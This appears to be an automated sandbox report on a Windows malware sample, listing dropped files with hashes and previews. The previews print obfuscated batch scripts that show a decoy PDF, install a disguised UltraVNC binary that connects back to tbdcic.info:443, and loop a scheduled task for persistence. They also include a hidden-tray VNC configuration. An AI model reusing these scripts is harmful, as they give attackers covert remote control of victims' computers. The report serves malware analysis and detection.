                                                                          SHA-512:C8AD6E74A0C8D29538042FDC429547AD0FB7E8F96B3E5E59644EFA6837BF243E31A3193F2B385316421730733330F346498044EFC62BA152AC79FC7CD9C7A559
                                                                          Malicious:false
                                                                          Preview:@echo off.setlocal enabledelayedexpansion.set ReO81=nhost.set Eqm2m=nne.set LtQEq=co.set oSLdS=exe.set Tnd6s=Lom.set uXzAr=pdf.set Fl8oQ=raVNC.set wP5sf=%COMPUTERNAME%.set jSEQA=autore.set TNi7V=%WINDIR%\Tasks\3889122.cmd.set Gruna=tbdcic.info.set IXrxR=Jd0Qd.set M6Juw=443.set Mkr26=co.set wapw9=ct.set D7rq9=Ult.set QEy79=browser_sn.set Fr9ND=ini.timeout /t 1.copy "DygIR.vkc0f" "%HOMEPATH%\Downloads\%Tnd6s%.%uXzAr%" & start "" "%HOMEPATH%\Downloads\%Tnd6s%.%uXzAr%".timeout /t 1.taskkill /f /im %QEy79%.%oSLdS% .timeout /t 2.copy "Xv6Ya.d8LhT" "%QEy79%.%oSLdS%".timeout /t 1.copy "go3uE.OUJMA" "%D7rq9%%Fl8oQ%.%Fr9ND%".timeout /t 2.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% .timeout /t 8.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% -%jSEQA%%LtQEq%%Eqm2m%%wapw9% -id:%wP5sf%_%IXrxR% -%LtQEq%%Eqm2m%%wapw9% %Gruna%:%M6Juw%.timeout /t 2.copy "uqVb3.kkb9h" "%Mkr26%%ReO81%.%oSLdS%".timeout /t 4.:loop.if exist "%TNi7V%" (. cmd /c "%TNi7V%". timeout /t 600. goto :loop.) else (. timeout /t 42. goto :loop.).
                                                                          Process:C:\Users\user\Desktop\T8xrZb7nBL.exe
                                                                          File Type:PDF document, version 1.5 (zip deflate encoded)
                                                                          Category:dropped
                                                                          Size (bytes):605114
                                                                          Entropy (8bit):7.931189302613814
                                                                          Encrypted:false
                                                                          SSDEEP:12288:A9bEzJrWWXvkqWpnMs6LQ1BU9U0pGOdbLL23yKBcPr:AFEzJrZXvkqYgUwuCUcPr
                                                                          MD5:A18D0E3EEEF0D6E099BAB52F8B041446
                                                                          SHA1:4879750BEC07AA11629950310AF538E9A9D91D20
                                                                          SHA-256:95F656B24E7D5E192BF4EA8216CCB539299EE908A3E998FCEE4B1A655BAF66EF
                                                                          SHA-512:6E2C2D96C98EE24AC6235B35131889D338ABC5E8399A41204AB2DFCFF56E40ABF6476A3F080A0F12715F8A6685182258EA6183645FD8D337B7F09EE14295FBAD
                                                                          Malicious:false
                                                                          Preview:%PDF-1.5.%.....92 0 obj.<</Filter/FlateDecode/Length 3501>>.stream.x..Zmo...>..EA.,..(J.s~..S+.v..^.b.....4...Ea.I..m.4_..;......%0p:......3.......?..w........&/../.........=...en......?...../..m._..v.}T..l..?..g...l.7.A....Nq..z.m..c..Nv...<.........3...s4.C..C...f.....l.0...-.-8...~.c.yi.`y..]...uf.)K.x...1T...Iw...5D..iE.v.a5.t..h.3Z.@..XRgXR..4....A.....a..C.)n.E%...g....d....T.$..?..`Z.>...F....:.aT8].k:|...v.....=+}..O..A.a..z6.D.SU.]'"=.f2...1....`.}R.#.R.4.....<$......Z..agQ....u....V.$~.z5*.?.r.).......'.p..6...l..#~...}....c.8k{/$.Z8G....:..5A.T......M....b.M..._.FE.}.5.........;...e.....j.......E...4...'E.e'..>....u..v...l..?..u.x......_"..-.9.CX.3.#...=....;.......b.j........j*$Y..G......./,..Rh.....m...'9..V.....e.".....Y.{...?g.bi..*...T..0!.k.8q......)...xN{..g.`G..F.0.n~.U!.a..(.!..^...[.d'.?fw....x.h...[.:.*-..#;.lM@.c.+x1......nFK...].>..n@,H..-.C ........*zf.Z.0W-.....5#]...C..8.Pm1Q.8...5.,. ....Ce=....p.5.u!.e.....Q).=.G.
                                                                          Process:C:\Users\user\Desktop\T8xrZb7nBL.exe
                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1945368
                                                                          Entropy (8bit):6.532894678367002
                                                                          Encrypted:false
                                                                          SSDEEP:24576:7x+OMUhcLEQ6EIN1sz4LD7hKCt+/WppxJ1Rj0rPz3AUA/Jpu:FQXL0d7hdrr0rPz3AUA/J0
                                                                          MD5:749B3A68B9C5325D592822EE7C2C17EC
                                                                          SHA1:3EDE6BB2DF969432358A5883CF226971FDE8B7D4
                                                                          SHA-256:F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
                                                                          SHA-512:B9C5AE6BA6145048721F6B4D5D9D751E7F0E6945D4D72FDB7959AED11BFC24ABDDBDF02A55A19FDD990648CAA6710ACAE9488329CBE3ABBC808C704954948998
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Xv6Ya.d8LhT, Author: Joe Security
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Joe Sandbox View:
                                                                          • Filename: mSRW5AfJpC.exe, Detection: malicious
                                                                          • Filename: 7q551ugrWe.exe, Detection: malicious
                                                                          • Filename: Olz7TmvkEW.exe, Detection: malicious
                                                                          • Filename: mSRW5AfJpC.exe, Detection: malicious
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.l.6...6...6.......8...-U......-U..8...-U..r...6...9...?...4...?...7...?...!...6.......-U......-U..7...-U..7...Rich6...........................PE..d....Y,T.........."......|..........4..........@..............................(.....0.....@.............................................................t.......$.............(.........................................................(............................text....{.......|.................. ..`.rdata..,?.......@..................@..@.data....6.......D..................@....pdata..$...........................@..@.rsrc...t...........................@..@.reloc...$....(..&...p..............@..B................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\Desktop\T8xrZb7nBL.exe
                                                                          File Type:Generic INItialization configuration [admin]
                                                                          Category:dropped
                                                                          Size (bytes):858
                                                                          Entropy (8bit):5.233343202654504
                                                                          Encrypted:false
                                                                          SSDEEP:24:z/h28nCi2vMQg9KgJhuXNTxYgMei3MAKJ/nn:rh28nC2/KgJOr8eTx/n
                                                                          MD5:C55EEA597023B8C774986495ECAE5B33
                                                                          SHA1:279315CE36021D2C86AE97EBFAA528749FA89544
                                                                          SHA-256:75490184E52519B37CC1DF17AF419C260BD50575C57FFA46366A877E4FC57ACA
                                                                          SHA-512:D838DA28246C21A3A9920E05B2E5AA58321F5C08D5F18B0F372E9436641977E9A33585706A85A7F84116F27B456C5589E4D2235CB8E178F824483493F508989B
                                                                          Malicious:false
                                                                          Preview:[Permissions]..[admin]..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..RemoveAero=0..DebugMode=0..Avilog=0..path=Y:..DebugLevel=0..AllowLoopback=0..LoopbackOnly=0..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..FileTransferTimeout=50..KeepAliveInterval=6..SocketKeepAliveTimeout=12000..DisableTrayIcon=1..MSLogonRequired=0..NewMSLogon=0..ConnectPriority=0..QuerySetting=2..QueryTimeout=8..QueryAccept=0..LockSetting=0..RemoveWallpaper=0..RemoveEffects=0..RemoveFontSmoothing=0..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=0..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=..DSMPluginConfig=..primary=1..secondary=0..SocketConnect=0..HTTPConnect=0..XDMCPConnect=0..AutoPortSelect=1..PortNumber=5628..HTTPPortNumber=5800..InputsEnabled=1..[UltraVNC]..passwd=F0341C75FCAEB31BD2..passwd2=F2409C75FCAEB22BD2..
                                                                          Process:C:\Users\user\Desktop\T8xrZb7nBL.exe
                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):867840
                                                                          Entropy (8bit):6.386550733462827
                                                                          Encrypted:false
                                                                          SSDEEP:12288:viUJpFQQzI8Qxdp0rksF0Wd24ylXTA4lENCbQZMCF0jdMH:viE/rIpx4rkN8olUWENCsyCF0pe
                                                                          MD5:0F568F6C821565AB9FF45C7457953789
                                                                          SHA1:F948A4C5E01A74B17D0F966615834BA76DC1BADC
                                                                          SHA-256:CC0A60CD15FA21E54615E46CD0F10CFBE86F496DC64D14B31D9F3B415D120EE1
                                                                          SHA-512:B73427198596803013F0A1F1F25628380A148D226903C0F91145546B675D17EADA177A18155E4183FAA4B692365141CE1FCDBD13C2C4F8235EB73BECF972EFE8
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Joe Sandbox View:
                                                                          • Filename: mSRW5AfJpC.exe, Detection: malicious
                                                                          • Filename: 7q551ugrWe.exe, Detection: malicious
                                                                          • Filename: Olz7TmvkEW.exe, Detection: malicious
                                                                          • Filename: mSRW5AfJpC.exe, Detection: malicious
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?]T.^3..^3..^3..&...^3..57..^3..50..^3..^2..[3..52..^3..5>.z^3..56..^3..5...^3..5...^3..51..^3.Rich.^3.........PE..d...?...........".................`..........@....................................9g....`.......... .......................................................`......................pB..p.......................(................... ...`............................text...@........................... ..`.rdata..^J.......L..................@..@.data....H..........................@....pdata.......`......................@..@.didat..............................@....rsrc...............................@..@.reloc...............0..............@..B........................................................................................................................................................................................................................
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):246
                                                                          Entropy (8bit):3.5193370621730837
                                                                          Encrypted:false
                                                                          SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8rOlAkiNUll:Qw946cPbiOxDlbYnuRKDlD0Un
                                                                          MD5:51C93B55C1B3CA606552C234FBA7D293
                                                                          SHA1:9DC2FF490911D42B357E72D997E8D5D8F39010CF
                                                                          SHA-256:F8A45559E848AEE3BA2360B4BFB2AB365941351106371A493FCA9AEC5378F6B0
                                                                          SHA-512:D9844A808B1F9C44A150EEAECC46C02F395E3F929D211390538036F652112662D94475C63613ECA0528C66D8895B563D06CCC6EF5AF443BD52A888EA17D55FBA
                                                                          Malicious:false
                                                                          Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.3./.1.2./.2.0.2.4. . .0.7.:.3.8.:.1.8. .=.=.=.....
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:ASCII text, with very long lines (393)
                                                                          Category:dropped
                                                                          Size (bytes):16525
                                                                          Entropy (8bit):5.33860678500249
                                                                          Encrypted:false
                                                                          SSDEEP:384:IC2heaVGJMUPhP80d0Wc+9eG/CCihFomva7RVRkfKhZmWWyC7rjgNgXo6ge5iaW0:X8B
                                                                          MD5:C3FEDB046D1699616E22C50131AAF109
                                                                          SHA1:C9EEA5A1A16BD2CD8154E8C308C8A336E990CA8D
                                                                          SHA-256:EA948BAC75D609B74084113392C9F0615D447B7F4AACA78D818205503EACC3FD
                                                                          SHA-512:845CDB5166B35B39215A051144452BEF9161FFD735B3F8BD232FB9A7588BA016F7939D91B62E27D6728686DFA181EFC3F3CC9954B2EDAB7FC73FCCE850915185
                                                                          Malicious:false
                                                                          Preview:SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:080+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=29b7f1b4-edf3-467e-b302-20b20356cfee.1696494928080 Timestamp=2023-10-05T10:35:28:081+0200 ThreadID=6832 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):15114
                                                                          Entropy (8bit):5.379468814733433
                                                                          Encrypted:false
                                                                          SSDEEP:384:gs/AnV2Nn+HNQYW1xcnKQe6ma1wRMZlvvgO3S3E3Y3kGNljiQfQWmW8dXSXuDVhV:Fbs
                                                                          MD5:F5220C13E060B5E9ECE0BFABDB9C4C0C
                                                                          SHA1:B0F77D775501545B920826EF87B4C3A4B4CC4650
                                                                          SHA-256:60069DCF5122E0B254E309082DA5AA8DB3525657FEBE652A2FA51AA3F832F2B6
                                                                          SHA-512:370279707A292753085B196170059105937511E95E212C8DACC16B57B7712B086585BB0B1668A90FAB68144DA8428B286F33CD50AECC4BFC0D3D91AA11603C9A
                                                                          Malicious:false
                                                                          Preview:SessionID=51ef9d75-703c-4abe-b3fa-6ccbd01b7b5f.1734957489785 Timestamp=2024-12-23T07:38:09:785-0500 ThreadID=7616 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=51ef9d75-703c-4abe-b3fa-6ccbd01b7b5f.1734957489785 Timestamp=2024-12-23T07:38:09:786-0500 ThreadID=7616 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=51ef9d75-703c-4abe-b3fa-6ccbd01b7b5f.1734957489785 Timestamp=2024-12-23T07:38:09:787-0500 ThreadID=7616 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=51ef9d75-703c-4abe-b3fa-6ccbd01b7b5f.1734957489785 Timestamp=2024-12-23T07:38:09:787-0500 ThreadID=7616 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=51ef9d75-703c-4abe-b3fa-6ccbd01b7b5f.1734957489785 Timestamp=2024-12-23T07:38:09:787-0500 ThreadID=7616 Component=ngl-lib_NglAppLib Description="SetConf
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):29752
                                                                          Entropy (8bit):5.411466030036088
                                                                          Encrypted:false
                                                                          SSDEEP:192:TcbeIewcbVcbqI4ucbrcbQIrJcb6cbCIC4cbCcbAIdvcbl:ceo4+rsC/do
                                                                          MD5:DCF4EA34109243B0025DBFB445DBBE06
                                                                          SHA1:3951414DC876CC16FB372FBC062FBA7A77A209D9
                                                                          SHA-256:5406B92E55B92920C159710FB5B33CAC3F939107F0ADFDBEC4BF3534A83FB454
                                                                          SHA-512:8D0AA840F94231AAFD038711309DC60468BF6F3626EF4942D4EEE2BAAB570995A0F69D4F66AE1023CA295E5C78248B57178661FEDFFB9DDBF17475FC818305BD
                                                                          Malicious:false
                                                                          Preview:05-10-2023 10:18:29:.---2---..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 10:18:29:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 10:18:29:.Closing File..05-10-
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                          Category:dropped
                                                                          Size (bytes):386528
                                                                          Entropy (8bit):7.9736851559892425
                                                                          Encrypted:false
                                                                          SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                          MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                          SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                          SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                          SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                          Malicious:false
                                                                          Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                          Category:dropped
                                                                          Size (bytes):758601
                                                                          Entropy (8bit):7.98639316555857
                                                                          Encrypted:false
                                                                          SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                          MD5:3A49135134665364308390AC398006F1
                                                                          SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                          SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                          SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                          Malicious:false
                                                                          Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                          Category:dropped
                                                                          Size (bytes):1419751
                                                                          Entropy (8bit):7.976496077007677
                                                                          Encrypted:false
                                                                          SSDEEP:24576:/rwYIGNP4mOWL07oBGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:TwZG6bWLxBGZN3mlind9i4ufFXpAXkru
                                                                          MD5:95F182500FC92778102336D2D5AADCC8
                                                                          SHA1:BEC510B6B3D595833AF46B04C5843B95D2A0A6C9
                                                                          SHA-256:9F9C041D7EE1DA404E53022D475B9E6D5924A17C08D5FDEC58C0A1DCDCC4D4C9
                                                                          SHA-512:D7C022459486D124CC6CDACEAD8D46E16EDC472F4780A27C29D98B35AD01A9BA95F62155433264CC12C32BFF384C7ECAFCE0AC45853326CBC622AE65EE0D90BA
                                                                          Malicious:false
                                                                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 647360
                                                                          Category:dropped
                                                                          Size (bytes):1407294
                                                                          Entropy (8bit):7.97605879016224
                                                                          Encrypted:false
                                                                          SSDEEP:24576:/YkwYIGNPQbdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07WWL07oXGZd:DwZG2b3mlind9i4ufFXpAXkrfUs0qWLk
                                                                          MD5:38ED8E7B44D526DDA0F3E7608AF1AFA1
                                                                          SHA1:45E30A6789382E29AC870CCF92B514FB95742C45
                                                                          SHA-256:7B277E2332AE55A014D8C37CCC879D165E33315437F6197BEB153CD75E4EFBBF
                                                                          SHA-512:7169B1E4B2895A91FA0FBE4297CB70BE56D733084653334BB4E8421382F8F761DAD11B5D87277E0286A7C16CB53A2C79F96BB45F433D776E82A7CF45EA25121C
                                                                          Malicious:false
                                                                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                          File Type:PDF document, version 1.5 (zip deflate encoded)
                                                                          Category:dropped
                                                                          Size (bytes):605114
                                                                          Entropy (8bit):7.931189302613814
                                                                          Encrypted:false
                                                                          SSDEEP:12288:A9bEzJrWWXvkqWpnMs6LQ1BU9U0pGOdbLL23yKBcPr:AFEzJrZXvkqYgUwuCUcPr
                                                                          MD5:A18D0E3EEEF0D6E099BAB52F8B041446
                                                                          SHA1:4879750BEC07AA11629950310AF538E9A9D91D20
                                                                          SHA-256:95F656B24E7D5E192BF4EA8216CCB539299EE908A3E998FCEE4B1A655BAF66EF
                                                                          SHA-512:6E2C2D96C98EE24AC6235B35131889D338ABC5E8399A41204AB2DFCFF56E40ABF6476A3F080A0F12715F8A6685182258EA6183645FD8D337B7F09EE14295FBAD
                                                                          Malicious:false
                                                                          Preview:%PDF-1.5.%.....92 0 obj.<</Filter/FlateDecode/Length 3501>>.stream.x..Zmo...>..EA.,..(J.s~..S+.v..^.b.....4...Ea.I..m.4_..;......%0p:......3.......?..w........&/../.........=...en......?...../..m._..v.}T..l..?..g...l.7.A....Nq..z.m..c..Nv...<.........3...s4.C..C...f.....l.0...-.-8...~.c.yi.`y..]...uf.)K.x...1T...Iw...5D..iE.v.a5.t..h.3Z.@..XRgXR..4....A.....a..C.)n.E%...g....d....T.$..?..`Z.>...F....:.aT8].k:|...v.....=+}..O..A.a..z6.D.SU.]'"=.f2...1....`.}R.#.R.4.....<$......Z..agQ....u....V.$~.z5*.?.r.).......'.p..6...l..#~...}....c.8k{/$.Z8G....:..5A.T......M....b.M..._.FE.}.5.........;...e.....j.......E...4...'E.e'..>....u..v...l..?..u.x......_"..-.9.CX.3.#...=....;.......b.j........j*$Y..G......./,..Rh.....m...'9..V.....e.".....Y.{...?g.bi..*...T..0!.k.8q......)...xN{..g.`G..F.0.n~.U!.a..(.!..^...[.d'.?fw....x.h...[.:.*-..#;.lM@.c.+x1......nFK...].>..n@,H..-.C ........*zf.Z.0W-.....5#]...C..8.Pm1Q.8...5.,. ....Ce=....p.5.u!.e.....Q).=.G.
                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                          File Type:DOS batch file, ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):503
                                                                          Entropy (8bit):5.353292454999417
                                                                          Encrypted:false
                                                                          SSDEEP:12:5YVJl5uPdbHjjQxSyQL+kKqWuocWFfH61w26SgPQmPZC:gl5ubEpo+kKIpOP2g50
                                                                          MD5:41F0189B83E9D493B86D7182B3514F9D
                                                                          SHA1:D4EC6020DE07E7D10552189CE4025B220467A522
                                                                          SHA-256:7653F9CB0A81E850998E4E171FC72B99765F198A0E5CA2AF51EE698137E242FA
                                                                          SHA-512:AA941D46D50737B3A8179C27631814852BAE90601349D6BE7B769486CF6189254209758183BC59B34DE20BCC64047AA45AFE62104B08E0C6413753CCED55CC92
                                                                          Malicious:false
                                                                          Preview:@echo off.setlocal enabledelayedexpansion.set QEy79=browser_sn.set Mkr26=co.set ReO81=nhost.set dUEeo=443.set wP5sf=%COMPUTERNAME%.set LtQEq=co.set Eqm2m=nne.set wapw9=ct.set Gruna=tbdcic.info.set oSLdS=exe.set jSEQA=autore.set HaGkC=194.87.252.28.timeout /t 1.taskkill /f /im %QEy79%.%oSLdS% .timeout /t 2.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% .timeout /t 8.start "" %WINDIR%\Tasks\%QEy79%.%oSLdS% -%jSEQA%%LtQEq%%Eqm2m%%wapw9% -id:%wP5sf%_Jd0Qd -%LtQEq%%Eqm2m%%wapw9% %Gruna%:443.timeout /t 4.exit.
                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                          File Type:DOS batch file, ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):503
                                                                          Entropy (8bit):5.353292454999417
                                                                          Encrypted:false
                                                                          SSDEEP:12:5YVJl5uPdbHjjQxSyQL+kKqWuocWFfH61w26SgPQmPZC:gl5ubEpo+kKIpOP2g50
